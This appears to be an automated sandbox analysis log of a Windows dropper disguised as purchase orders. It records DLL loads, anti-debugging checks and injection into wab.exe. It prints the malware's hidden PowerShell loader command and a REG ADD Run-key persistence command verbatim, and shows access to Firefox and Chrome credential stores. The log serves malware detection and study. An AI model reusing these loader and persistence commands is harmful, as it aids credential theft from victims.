              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | Section loaded: coremessaging.dll
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | Section loaded: wintypes.dll
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | Section loaded: wintypes.dll
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | Section loaded: wintypes.dll
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | Section loaded: textshaping.dll
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: windows.storage.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wldp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: uxtheme.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: propsys.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: profapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: slc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: z14Novospedidosdecompra_Profil_4903.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: stem.Core.pdb_K source: powershell.exe, 00000001.00000002.2404825141.0000000008A40000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000001.00000002.2393081207.0000000003286000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.2404825141.0000000008A5F000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: Yara match; File source: 00000001.00000002.2405665204.0000000009F4C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Anti Malware Scan Interface: GetDelegateForFunctionPointer((Skydevinduers $Legerdemainist $adjurors), (Scarabaeidae @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Begins = [AppDomain]::CurrentDomain.GetAssemblies()
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Abaisse)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Kontorpersonalerne46, $false).DefineType($Bogkbet
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Bromslvs=Get-Content 'C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Kursusplans.Fje';$Oxyphosphate=$Bromslvs.SubString(61080,3);.$Oxyphosphate($Bromslvs)"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Code function: 12_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 1_2_07B0A119 push 8B060624h; iretd 1_2_07B0A11E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 1_2_07B0A044 push 8B6B16D0h; iretd 1_2_07B0A049
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Code function: 12_2_0044693D push ecx; ret 12_2_0044694D
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Code function: 12_2_0044DB70 push eax; ret 12_2_0044DB84
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Code function: 12_2_0044DB70 push eax; ret 12_2_0044DBAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Code function: 12_2_00451D54 push eax; ret 12_2_00451D61
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Code function: 13_2_0044B090 push eax; ret 13_2_0044B0A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Code function: 13_2_0044B090 push eax; ret 13_2_0044B0CC
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Code function: 13_2_00444E71 push ecx; ret 13_2_00444E81
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Code function: 14_2_00414060 push eax; ret 14_2_00414074
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Code function: 14_2_00414060 push eax; ret 14_2_0041409C
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Code function: 14_2_00414039 push ecx; ret 14_2_00414049
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Code function: 14_2_004164EB push 0000006Ah; retf 14_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Code function: 14_2_00416553 push 0000006Ah; retf 14_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Code function: 14_2_00416555 push 0000006Ah; retf 14_2_004165C4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten\z14Novospedidosdecompra_Profil_4903.exe
              Source: C:\Windows\SysWOW64\reg.exe; Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup key
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Code function: 13_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
              Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe; Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,12_2_0040DD85
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5964
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3811
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 2911
Source: C:\Program Files (x86)\Windows Mail\wab.exe API coverage: 9.3 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7188 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8028 Thread sleep count: 2911 > 30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread sleep count: Count: 2911 delay: -5
Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe Code function: 0_2_00405841 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405841
Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe Code function: 0_2_004027FB FindFirstFileW,0_2_004027FB
Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe Code function: 0_2_00406393 FindFirstFileW,FindClose,0_2_00406393
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_0040AE51 FindFirstFileW,FindNextFileW,12_2_0040AE51
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407EF8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407898
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_00418981 memset,GetSystemInfo,12_2_00418981
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\skabiose\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
Source: wab.exe, 00000007.00000002.2939812066.00000000096BC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wab.exe, 00000007.00000002.2939812066.00000000096F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWH
Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe API call chain: ExitProcess graph end node graph_0-2864
Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe API call chain: ExitProcess graph end node graph_0-3043
Source: C:\Program Files (x86)\Windows Mail\wab.exe API call chain: ExitProcess graph end node graph_13-33816
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

              Anti Debugging

              barindex
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread information set: HideFromDebugger
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_04AEDAAC LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,1_2_04AEDAAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,12_2_0040DD85
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,12_2_004044A4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process token adjusted: Debug

              HIPS / PFW / Operating System Protection Evasion

              barindex
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3DA0000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2B3F8CC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Slettelsers% -windowstyle minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers% ($ronnels)"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wjdznalymjqnxoyrjyc"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hdqrgswaarisauuvaipksos"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jfwcglgtwzafkaizktcddtnovi"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Slettelsers% -windowstyle minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers% ($ronnels)"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "startup key" /t reg_expand_sz /d "%slettelsers% -windowstyle minimized $ronnels=(get-itemproperty -path 'hkcu:\forsorgspdagog\').skeletoverstter;%slettelsers% ($ronnels)"
Source: wab.exe, 00000007.00000002.2939960711.000000000971C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2443472067.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2939981416.000000000974C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: wab.exe, 00000007.00000002.2939981416.000000000974C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerr|
Source: wab.exe, 00000007.00000003.2443472067.000000000974C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2939981416.000000000974C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerlesos
Source: wab.exe, 00000007.00000002.2939960711.000000000971C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerQ*3:
Source: wab.exe, 00000007.00000002.2939981416.000000000974C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager05776
Source: wab.exe, 00000007.00000002.2939981416.000000000974C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_0041881C GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,12_2_0041881C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,13_2_004082CD
Source: C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe Code function: 0_2_00406072 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406072
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              barindex
Source: Yara match File source: 00000007.00000003.2417745703.000000000971E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2443472067.000000000971E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2939981416.000000000971F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2417578332.000000000971A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 7812, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\mqerms.dat, type: DROPPED
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
